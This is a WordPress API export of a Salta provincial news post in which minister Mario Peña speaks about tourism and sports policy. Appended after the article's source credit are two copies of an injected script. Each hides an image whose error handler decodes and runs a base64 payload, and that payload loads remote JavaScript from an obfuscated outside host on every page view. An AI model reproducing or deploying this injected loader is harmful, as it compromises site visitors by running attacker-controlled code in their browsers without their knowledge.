{"id":3404,"date":"2023-12-11T09:46:07","date_gmt":"2023-12-11T12:46:07","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3404"},"modified":"2025-08-14T00:03:43","modified_gmt":"2025-08-14T03:03:43","slug":"en-los-proximos-anos-se-profundizara-el-federalismo-en-la-gestion-turistica-y-deportiva","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3404","title":{"rendered":"\u201cEn los pr\u00f3ximos a\u00f1os se profundizar\u00e1 el federalismo en la gesti\u00f3n tur\u00edstica y deportiva\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a10f34\"><em>Lo asegur\u00f3 el ministro de Turismo y Deportes Mario Pe\u00f1a tras el juramento tomado por el gobernador Gustavo S\u00e1enz.<\/em><\/h3>\n\n\n\n<p>La decisi\u00f3n de concentrar las pol\u00edticas tur\u00edsticas y deportivas en el mismo Ministerio, responde a las condiciones naturales que tienen estas dos actividades para la complementariedad, potenciando el impacto y beneficios para los salte\u00f1os. Con ese lineamiento se trabaj\u00f3 desde diciembre de 2019 vali\u00e9ndose de una sinergia con los 60 municipios, el sector privado del turismo y la dirigencia deportiva.<\/p>\n\n\n\n<p>\u201cAgradezco la confianza del gobernador&nbsp;<strong>Gustavo S\u00e1enz&nbsp;<\/strong>para conducir el Ministerio de Turismo y Deportes, que adem\u00e1s de las secretar\u00edas correspondientes, tiene competencia en los parques urbanos, Inprotur, el camping El Pr\u00e9stamo, Telef\u00e9rico, Centro de Convenciones, Tren a las Nubes, entre otras dependencias\u201d, indic\u00f3 el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10175-en-los-proximos-anios-se-profundizara-el-federalismo-en-la-gestion-turistica-y-deportiva.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10175-en-los-proximos-anios-se-profundizara-el-federalismo-en-la-gestion-turistica-y-deportiva.jpg\" alt=\"\u201cEn los pr\u00f3ximos a\u00f1os se profundizar\u00e1 el federalismo en la gesti\u00f3n tur\u00edstica y deportiva\u201d\"\/><\/a><\/figure>\n\n\n\n<p>\u201cExiste la convicci\u00f3n pol\u00edtica de seguir trabajando por la mejora continua y mayor federalismo en el turismo y en la actividad deportiva de Salta, con un equipo que siempre estar\u00e1 presente en toda la provincia\u201d, agreg\u00f3 el funcionario, quien sostuvo que \u201clos pr\u00f3ximos meses ser\u00e1n complejos, pero se pondr\u00e1 el m\u00e1ximo esfuerzo para acompa\u00f1ar y estar cerca de la gente\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-los-proximos-anios-se-profundizara-el-federalismo-en-la-gestion-turistica-y-deportiva-93303\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo asegur\u00f3 el ministro de Turismo y Deportes Mario Pe\u00f1a tras el juramento tomado por el gobernador Gustavo S\u00e1enz. La decisi\u00f3n de concentrar las pol\u00edticas tur\u00edsticas y deportivas en el mismo Ministerio, responde a las condiciones naturales que tienen estas dos actividades para la complementariedad, potenciando el impacto y beneficios para los salte\u00f1os. Con ese [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3405,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3404","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3404"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3404"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3404\/revisions"}],"predecessor-version":[{"id":6896,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3404\/revisions\/6896"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3405"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}